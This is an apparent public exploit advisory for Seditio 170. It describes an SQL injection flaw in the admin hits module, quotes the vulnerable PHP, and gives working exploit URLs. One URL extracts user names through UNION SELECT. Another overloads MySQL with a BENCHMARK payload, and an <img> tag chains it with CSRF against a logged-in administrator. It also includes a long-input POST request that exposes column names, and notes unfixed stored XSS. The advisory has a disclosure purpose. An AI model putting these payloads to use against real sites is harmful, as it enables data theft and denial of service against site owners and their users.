Vuln Desc:
Seditio 170 (seditio-build170.20120302) is Prone to SQL injection vulnerability.
Note:For successfull exploitation requires administrative authentication to system.
//system/core/admin/admin.hits.inc.php
//Vulnerable Code Section
$f = sed_import('f','G','TXT');
$v = sed_import('v','G','TXT');
if ($f=='year' || $f=='month')
{
$adminpath[] = array ("admin.php?m=hits&f=".$f."&v=".$v, "(".$v.")");
$sql = sed_sql_query("SELECT * FROM $db_stats WHERE stat_name LIKE '$v%' ORDER BY stat_name DESC");
Exploit:
Extract user(s)/admin(s)/moder(s) details:
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20union%20select%201,user_name%20from%20sed170_users%20limit%201--%20or%271%27!=%271--
Overload MYSQL server:(As result Mysql Server Goes Down+High CPU Load in other words: Create Denial Of Service throught sql injection)
http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--
Note: It can be mixed with CSRF especially if you have no any access to system as admin.
In eg:
<img src="http://192.168.0.15/learn/128/sed/seditio.170/admin.php?m=hits&f=year&v=1%27%20or%20%28select%20benchmark%28100000000000000000,sha1%28md5%28now%28%29%29%29%29%29%20or%271%27!=%271--" />
Print screen:
http://s019.radikal.ru/i625/1204/6d/842088135393.png
Information Disclosure:
Try to post in inputs very long string.
Application will expose column.names which is not acceptable anymore from security consideration.
In eg:
Client Side validation:
<tr>
<td>Location:</td>
<td><input type="text" class="text" name="ruserlocation" value="" size="32" maxlength="64" /></td>
</tr>
http://192.168.0.15/learn/128/sed/seditio.170/users.php?m=profile&a=update&x=EONODP
Post data:
userid=1&curpassword=&ruserhideemail=1&ruserpmnotify=0&ruserskin=artic&ruserlang=en&rusercountry=00&ruserlocation=aaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&rusertimezone=-12&ruserwebsite=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&
ryear=0&rmonth=0&rday=0&ruseroccupation=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&rusergender=U&MAX_FILE_SIZE=65536000&userfile=&rusertext=&rnewpass1=&rnewpass2=&x=EONODP
Error:
Title of your site
2012-04-12 04:55 / Fatal error : SQL error : Data too long for column 'user_occupation' at row 1
Persistent Cross Site Scripting vulnerability still unfixed.(from Seditio 161)
Same Info/Path disclosures still unfixed.(from Seditio 161).
("Thanks" for TinyMCE editor and thanks to client side validation)(from Seditio 161)
I notified about it here+ to vendor too but it still unfixed in 170.20120302 too.
====================PLEASE==HELP TO KEEP SEDITIO SECURE=================================
+++++++Greetz to all++++++++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com and
to all AA Team.
++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^